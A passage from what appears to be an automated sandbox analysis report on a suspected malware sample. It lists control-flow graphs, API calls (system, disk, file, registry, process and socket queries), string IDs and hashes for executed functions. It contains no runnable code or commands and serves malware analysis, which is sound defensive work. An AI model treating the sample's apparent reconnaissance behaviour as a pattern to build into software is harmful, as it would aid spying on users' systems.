_open 88750->88751 88752 2df9df 88751->88752 88753 2d75a0 _open 88752->88753 88754 2dfa12 88753->88754 88755 2d75a0 _open 88754->88755 88755->88756 88758 30d0f1 88757->88758 88763 30cd9a 88757->88763 88758->88739 88759 30d0e5 88760 321390 _open 88759->88760 88760->88758 88761 30ce6b 88764 30cf4b 88761->88764 88766 30d064 88761->88766 88784 30dc30 6 API calls 88761->88784 88762 30d0b4 88796 2ef6c0 11 API calls 88762->88796 88763->88759 88763->88761 88783 30dc30 6 API calls 88763->88783 88771 30d016 88764->88771 88774 30d018 88764->88774 88776 2e6fa0 4 API calls 88764->88776 88785 30e130 6 API calls 88764->88785 88786 30df30 88764->88786 88792 2e7380 _open 88764->88792 88766->88762 88795 30de00 6 API calls 88766->88795 88771->88766 88794 30de00 6 API calls 88771->88794 88793 2e7380 _open 88774->88793 88776->88764 88779 2df98d 88778->88779 88780 32139d 88778->88780 88779->88746 88781 2d75a0 _open 88780->88781 88781->88779 88782->88743 88783->88763 88784->88761 88785->88764 88787 30df44 88786->88787 88789 30dfb9 88787->88789 88791 30dfb5 88787->88791 88797 2e7450 _open 88787->88797 88798 2e7380 _open 88789->88798 88791->88764 88792->88764 88793->88771 88794->88771 88795->88766 88796->88759 88797->88787 88798->88791

                                    Executed Functions

                                    Function 0030F100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                    • API String ID: 0-1590685507
                                    • Opcode ID: bf3e10c50d33ee0191800c39bff7de0ace8ddfa8a2581b22716b3f83074f1a4d
                                    • Instruction ID: b93861becbdca7736ede7b1eafd139e3839f146c132597e787049d962af42ccc
                                    • Opcode Fuzzy Hash: bf3e10c50d33ee0191800c39bff7de0ace8ddfa8a2581b22716b3f83074f1a4d
                                    • Instruction Fuzzy Hash: C8C2C131A043449FD729CF29C494B6AB7E1BF88314F05C66DEC989B6A2D771ED84CB81
                                    Function 002D255D Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 282fileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 857 2d255d-2d2614 call 659f70 GetSystemInfo call 7a1cf0 call 7a1ee0 GlobalMemoryStatusEx call 7a1cf0 call 7a1ee0 939 2d2619 call 70a0c88 857->939 940 2d2619 call 70a0ac8 857->940 941 2d2619 call 70a0c4f 857->941 942 2d2619 call 70a0a8c 857->942 943 2d2619 call 70a0b43 857->943 944 2d2619 call 70a0983 857->944 945 2d2619 call 70a0a00 857->945 946 2d2619 call 70a09c1 857->946 947 2d2619 call 70a09da 857->947 948 2d2619 call 70a0a9b 857->948 949 2d2619 call 70a0bd9 857->949 950 2d2619 call 70a099d 857->950 951 2d2619 call 70a0b92 857->951 952 2d2619 call 70a0b53 857->952 953 2d2619 call 70a0a16 857->953 954 2d2619 call 70a0a57 857->954 955 2d2619 call 70a0b63 857->955 956 2d2619 call 70a09e6 857->956 957 2d2619 call 70a0c27 857->957 958 2d2619 call 70a0ca7 857->958 959 2d2619 call 70a0afb 857->959 960 2d2619 call 70a0cff 857->960 961 2d2619 call 70a0a32 857->961 962 2d2619 call 70a0b33 857->962 963 2d2619 call 70a0ab3 857->963 964 2d2619 call 70a0970 857->964 965 2d2619 call 70a0bb7 857->965 868 2d261b-2d2620 869 2d277c-2d2904 call 7a1cf0 call 7a1ee0 KiUserCallbackDispatcher call 7a1cf0 call 7a1ee0 call 7a1cf0 call 7a1ee0 call 658e38 call 658be0 call 658bd0 FindFirstFileW 868->869 870 2d2626-2d2637 call 7a1af0 868->870 917 2d2928-2d292c 869->917 918 2d2906-2d2926 FindNextFileW 869->918 874 2d2754-2d275c 870->874 876 2d263c-2d264f GetDriveTypeA 874->876 877 2d2762-2d2777 call 7a1ee0 874->877 879 2d2655-2d2685 GetDiskFreeSpaceExA 876->879 880 2d2743-2d2751 call 658b98 876->880 877->869 879->880 883 2d268b-2d273e call 7a1dc0 call 7a1e50 call 7a1ee0 call 7a1be0 call 7a1ee0 call 7a1be0 call 7a1ee0 call 7a0250 879->883 880->874 883->880 919 2d292e 917->919 920 2d2932-2d296f call 7a1cf0 call 7a1ee0 call 658e78 917->920 918->917 918->918 919->920 926 2d2974-2d2979 920->926 927 2d29a9-2d29fe call 65a2b0 call 7a1cf0 call 7a1ee0 926->927 928 2d297b-2d29a4 call 7a1cf0 call 7a1ee0 926->928 928->927 939->868 940->868 941->868 942->868 943->868 944->868 945->868 946->868 947->868 948->868 949->868 950->868 951->868 952->868 953->868 954->868 955->868 956->868 957->868 958->868 959->868 960->868 961->868 962->868 963->868 964->868 965->868
                                    APIs
                                    • GetSystemInfo.KERNELBASE ref: 002D2579
                                    • GlobalMemoryStatusEx.KERNELBASE ref: 002D25CC
                                    • GetDriveTypeA.KERNELBASE ref: 002D2647
                                    • GetDiskFreeSpaceExA.KERNELBASE ref: 002D267E
                                    • KiUserCallbackDispatcher.NTDLL ref: 002D27E2
                                    • FindFirstFileW.KERNELBASE ref: 002D28F8
                                    • FindNextFileW.KERNELBASE ref: 002D291F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                    • String ID: ;%-$@$`
                                    • API String ID: 3271271169-2524062253
                                    • Opcode ID: 762589b1c0bdb5b449eda966cb3c5be521592f9bfb521c0e294d4ba900a1e99d
                                    • Instruction ID: c0b4f3d83ffde3611003bc5ba48cc2a2baf00dcbd46fc04c0f6eae9f4f9e8e2a
                                    • Opcode Fuzzy Hash: 762589b1c0bdb5b449eda966cb3c5be521592f9bfb521c0e294d4ba900a1e99d
                                    • Instruction Fuzzy Hash: 02D1C3B4904309DFDB10EFA8C58569EBBF1BF88344F408969E898D7341E7349A88CF52
                                    Function 002D29FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321registryfileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1294 2d29ff-2d2a2f FindFirstFileA 1295 2d2a38 1294->1295 1296 2d2a31-2d2a36 1294->1296 1297 2d2a3d-2d2a91 call 7a1e50 call 7a1ee0 RegOpenKeyExA 1295->1297 1296->1297 1302 2d2a9a 1297->1302 1303 2d2a93-2d2a98 1297->1303 1304 2d2a9f-2d2b0c call 7a1e50 call 7a1ee0 CharUpperA call 658da0 1302->1304 1303->1304 1312 2d2b0e-2d2b13 1304->1312 1313 2d2b15 1304->1313 1314 2d2b1a-2d2b92 call 7a1e50 call 7a1ee0 call 658e80 call 658e70 1312->1314 1313->1314 1323 2d2bcc-2d2c66 QueryFullProcessImageNameA CloseHandle call 658da0 1314->1323 1324 2d2b94-2d2ba3 1314->1324 1334 2d2c6f 1323->1334 1335 2d2c68-2d2c6d 1323->1335 1327 2d2ba5-2d2bae 1324->1327 1328 2d2bb0-2d2bc0 call 658e68 1324->1328 1327->1323 1331 2d2bc5-2d2bca 1328->1331 1331->1323 1331->1324 1336 2d2c74-2d2ce9 call 7a1e50 call 7a1ee0 call 658e80 call 658e70 1334->1336 1335->1336 1345 2d2dcf-2d2e1c call 7a1e50 call 7a1ee0 CloseHandle 1336->1345 1346 2d2cef-2d2d49 call 658bb0 call 658da0 1336->1346 1355 2d2e23-2d2e2e 1345->1355 1359 2d2d99-2d2dad 1346->1359 1360 2d2d4b-2d2d63 call 658da0 1346->1360 1357 2d2e37 1355->1357 1358 2d2e30-2d2e35 1355->1358 1361 2d2e3c-2d2ed6 call 7a1e50 call 7a1ee0 1357->1361 1358->1361 1359->1345 1360->1359 1367 2d2d65-2d2d7d call 658da0 1360->1367 1376 2d2ed8-2d2ee1 1361->1376 1377 2d2eea 1361->1377 1367->1359 1372 2d2d7f-2d2d97 call 658da0 1367->1372 1372->1359 1378 2d2daf-2d2dc9 call 658e68 1372->1378 1376->1377 1379 2d2ee3-2d2ee8 1376->1379 1380 2d2eef-2d2f16 call 7a1e50 call 7a1ee0 1377->1380 1378->1345 1378->1346 1379->1380
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                    • String ID: 0
                                    • API String ID: 2406880114-4108050209
                                    • Opcode ID: 2c550d596b50a4b5e43a6cfbe15c89b737aa51f4b0e05cd72b6485ca5de80485
                                    • Instruction ID: 754948737114ebd9f6b877f34bab3e0cde05227b36b30dd6d8bbf8e76f4656d6
                                    • Opcode Fuzzy Hash: 2c550d596b50a4b5e43a6cfbe15c89b737aa51f4b0e05cd72b6485ca5de80485
                                    • Instruction Fuzzy Hash: B6E1F4B0904309DFCB50EFA8D98569EBBF5EF94344F40896AE888D7350EB749948CF42
                                    Function 002E05B0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 377networkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1533 2e05b0-2e05b7 1534 2e07ee 1533->1534 1535 2e05bd-2e05d4 1533->1535 1536 2e05da-2e05e6 1535->1536 1537 2e07e7-2e07ed 1535->1537 1536->1537 1538 2e05ec-2e05f0 1536->1538 1537->1534 1539 2e05f6-2e0620 call 2e7350 call 2d70b0 1538->1539 1540 2e07c7-2e07cc 1538->1540 1545 2e066a-2e068c call 30dec0 1539->1545 1546 2e0622-2e0624 1539->1546 1540->1537 1551 2e07d6-2e07e3 call 2e7380 1545->1551 1552 2e0692-2e06a0 1545->1552 1548 2e0630-2e0655 call 2d70d0 call 2e03c0 call 2e7450 1546->1548 1572 2e07ce 1548->1572 1573 2e065b-2e0668 call 2d70e0 1548->1573 1551->1537 1555 2e06f4-2e06f6 1552->1555 1556 2e06a2-2e06a4 1552->1556 1559 2e07ef-2e082b call 2e3000 1555->1559 1560 2e06fc-2e06fe 1555->1560 1562 2e06b0-2e06e4 call 2e73b0 1556->1562 1576 2e0a2f-2e0a35 1559->1576 1577 2e0831-2e0837 1559->1577 1564 2e072c-2e0754 1560->1564 1562->1551 1578 2e06ea-2e06ee 1562->1578 1568 2e075f-2e078b 1564->1568 1569 2e0756-2e075b 1564->1569 1590 2e0700-2e0703 1568->1590 1591 2e0791-2e0796 1568->1591 1574 2e075d 1569->1574 1575 2e0707-2e0719 WSAEventSelect 1569->1575 1572->1551 1573->1545 1573->1548 1583 2e0723-2e0726 1574->1583 1575->1551 1582 2e071f 1575->1582 1579 2e0a3c-2e0a52 1576->1579 1580 2e0a37-2e0a3a 1576->1580 1585 2e0839-2e084c call 2e6fa0 1577->1585 1586 2e0861-2e087e 1577->1586 1578->1562 1587 2e06f0 1578->1587 1579->1551 1588 2e0a58-2e0a81 call 2e2f10 1579->1588 1580->1579 1582->1583 1583->1559 1583->1564 1600 2e0a9c-2e0aa4 1585->1600 1601 2e0852 1585->1601 1597 2e0882-2e088d 1586->1597 1587->1555 1588->1551 1604 2e0a87-2e0a97 call 2e6df0 1588->1604 1590->1575 1591->1590 1595 2e079c-2e07c2 call 2d76a0 1591->1595 1595->1590 1602 2e0893-2e08b1 1597->1602 1603 2e0970-2e0975 1597->1603 1600->1551 1601->1586 1606 2e0854-2e085f 1601->1606 1609 2e08c8-2e08f7 1602->1609 1607 2e097b-2e0989 call 2d70b0 1603->1607 1608 2e0a19-2e0a2c 1603->1608 1604->1551 1606->1597 1607->1608 1616 2e098f-2e099e 1607->1616 1608->1576 1617 2e08fd-2e0925 1609->1617 1618 2e08f9-2e08fb 1609->1618 1619 2e09b0-2e09c1 call 2d70d0 1616->1619 1620 2e0928-2e093f 1617->1620 1618->1620 1624 2e09c3-2e09c7 1619->1624 1625 2e09a0-2e09ae call 2d70e0 1619->1625 1626 2e0945-2e096b 1620->1626 1627 2e08b3-2e08c2 1620->1627 1629 2e09e8-2e0a03 WSAEnumNetworkEvents 1624->1629 1625->1608 1625->1619 1626->1627 1627->1603 1627->1609 1631 2e0a05-2e0a17 1629->1631 1632 2e09d0-2e09e6 WSAEventSelect 1629->1632 1631->1632 1632->1625 1632->1629
                                    APIs
                                    • WSAEventSelect.WS2_32(?,?,?), ref: 002E0712
                                    • WSAEventSelect.WS2_32(?,?,00000000), ref: 002E09DC
                                    • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 002E09FC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: EventSelect$EnumEventsNetwork
                                    • String ID: N=-$multi.c
                                    • API String ID: 2170980988-3986511460
                                    • Opcode ID: b8bc8424fbaa25a9c763386d1e664ce82894699f21ad99b4b043e55758a8ed44
                                    • Instruction ID: 2700123548f9cb23262d8ad9a1a359926551ec627ad6b76aff9393091789e9ef
                                    • Opcode Fuzzy Hash: b8bc8424fbaa25a9c763386d1e664ce82894699f21ad99b4b043e55758a8ed44
                                    • Instruction Fuzzy Hash: B1D1F7716683869FE710CF61C8C1B6BB7E5FF94304F44482DF98486252E3B4E9A6CB52
                                    Function 002E6FA0 Relevance: 6.3, APIs: 4, Instructions: 261COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1704 2e6fa0-2e6fd2 1705 2e6feb-2e6ff1 1704->1705 1706 2e6fd4-2e6fd6 1704->1706 1708 2e6ff7-2e6ff9 1705->1708 1709 2e7324-2e7330 1705->1709 1707 2e6fe0-2e6fe4 1706->1707 1710 2e701b-2e7041 1707->1710 1711 2e6fe6-2e6fe9 1707->1711 1712 2e6fff-2e7016 1708->1712 1713 2e7186-2e7196 1708->1713 1714 2e7060-2e7074 1710->1714 1711->1705 1711->1707 1712->1709 1713->1709 1717 2e7076-2e7081 1714->1717 1718 2e7057-2e705a 1714->1718 1717->1718 1719 2e7083-2e7089 1717->1719 1718->1714 1720 2e7172-2e7174 1718->1720 1721 2e70dc-2e70df 1719->1721 1722 2e708b-2e708f 1719->1722 1723 2e719b-2e71a8 1720->1723 1724 2e7176-2e7184 1720->1724 1729 2e712c-2e7132 1721->1729 1730 2e70e1-2e70e5 1721->1730 1727 2e70b0-2e70bd 1722->1727 1728 2e7091 1722->1728 1725 2e71aa-2e71be 1723->1725 1726 2e71f1-2e722d call 2ed7f0 select 1723->1726 1724->1726 1731 2e730d-2e7310 1725->1731 1732 2e71c4-2e71c6 1725->1732 1754 2e730b 1726->1754 1755 2e7233-2e723e 1726->1755 1736 2e70bf-2e70ce 1727->1736 1737 2e70d5 1727->1737 1733 2e70a0-2e70a7 1728->1733 1729->1718 1734 2e7138-2e713c 1729->1734 1738 2e70e7 1730->1738 1739 2e7100-2e710d 1730->1739 1731->1709 1748 2e7312-2e7322 1731->1748 1742 2e71cc-2e71e6 1732->1742 1743 2e7331-2e7344 1732->1743 1733->1727 1744 2e70a9-2e70ac 1733->1744 1745 2e713e 1734->1745 1746 2e714d-2e715a 1734->1746 1736->1737 1737->1721 1749 2e70f0-2e70f7 1738->1749 1740 2e710f-2e711e 1739->1740 1741 2e7125 1739->1741 1740->1741 1741->1729 1742->1709 1764 2e71ec 1742->1764 1743->1709 1763 2e7346 1743->1763 1744->1733 1750 2e70ae 1744->1750 1751 2e7140-2e7144 1745->1751 1752 2e7050 1746->1752 1753 2e7160-2e716d 1746->1753 1748->1709 1749->1739 1756 2e70f9-2e70fc 1749->1756 1750->1727 1751->1746 1759 2e7146-2e7149 1751->1759 1752->1718 1753->1752 1754->1731 1760 2e725c-2e7269 1755->1760 1756->1749 1762 2e70fe 1756->1762 1759->1751 1765 2e714b 1759->1765 1766 2e726b-2e727b __WSAFDIsSet 1760->1766 1767 2e7253-2e7256 1760->1767 1762->1739 1763->1748 1764->1748 1765->1746 1768 2e727d-2e7287 1766->1768 1769 2e729a-2e72ac __WSAFDIsSet 1766->1769 1767->1709 1767->1760 1770 2e728e-2e7293 1768->1770 1771 2e7289 1768->1771 1772 2e72ae-2e72b3 1769->1772 1773 2e72ba-2e72c9 __WSAFDIsSet 1769->1773 1770->1769 1774 2e7295 1770->1774 1771->1770 1772->1773 1775 2e72b5 1772->1775 1776 2e72cf-2e72f6 1773->1776 1777 2e7240 1773->1777 1774->1769 1775->1773 1778 2e72fc-2e7306 1776->1778 1779 2e7245-2e724c 1776->1779 1777->1779 1778->1779 1779->1767
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 443efe3c61ee7e7639562c9fb8e5c7392fd26303edec835a2860b12f5130a140
                                    • Instruction ID: 11b8be1b8ecf7172a080d2bd3743785c98c3a1534b946cab83515d2a30651f50
                                    • Opcode Fuzzy Hash: 443efe3c61ee7e7639562c9fb8e5c7392fd26303edec835a2860b12f5130a140
                                    • Instruction Fuzzy Hash: 2C91033066C38A8BD7358E2AC8907BB72D5EFD4360F948B2CE898471D4E7709D619691
                                    Function 0039B180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1780 39b180-39b195 1781 39b19b-39b1a2 1780->1781 1782 39b3e0-39b3e7 1780->1782 1783 39b1b0-39b1b9 1781->1783 1783->1783 1784 39b1bb-39b1bd 1783->1784 1784->1782 1785 39b1c3-39b1d0 1784->1785 1787 39b3db 1785->1787 1788 39b1d6-39b1f2 1785->1788 1787->1782 1789 39b229-39b22d 1788->1789 1790 39b3e8-39b417 1789->1790 1791 39b233-39b246 1789->1791 1799 39b41d-39b429 1790->1799 1800 39b582-39b589 1790->1800 1792 39b248-39b24b 1791->1792 1793 39b260-39b264 1791->1793 1794 39b24d-39b256 1792->1794 1795 39b215-39b223 1792->1795 1797 39b269-39b286 call 39af30 1793->1797 1794->1797 1795->1789 1798 39b315-39b33c call 658b00 1795->1798 1808 39b288-39b2a3 call 39b060 1797->1808 1809 39b2f0-39b301 1797->1809 1811 39b3bf-39b3ca 1798->1811 1812 39b342-39b347 1798->1812 1803 39b42b-39b433 call 39b590 1799->1803 1804 39b435-39b44c call 39b590 1799->1804 1803->1804 1816 39b458-39b471 call 39b590 1804->1816 1817 39b44e-39b456 call 39b590 1804->1817 1828 39b2a9-39b2c7 getsockname call 39b020 1808->1828 1829 39b200-39b213 call 39b020 1808->1829 1809->1795 1825 39b307-39b310 1809->1825 1818 39b3cc-39b3d9 1811->1818 1820 39b349-39b358 1812->1820 1821 39b384-39b38f 1812->1821 1838 39b48c-39b4a7 1816->1838 1839 39b473-39b487 1816->1839 1817->1816 1818->1782 1826 39b360-39b382 1820->1826 1821->1811 1827 39b391-39b3a5 1821->1827 1825->1818 1826->1821 1826->1826 1835 39b3b0-39b3bd 1827->1835 1836 39b2cc-39b2dd 1828->1836 1829->1795 1835->1811 1835->1835 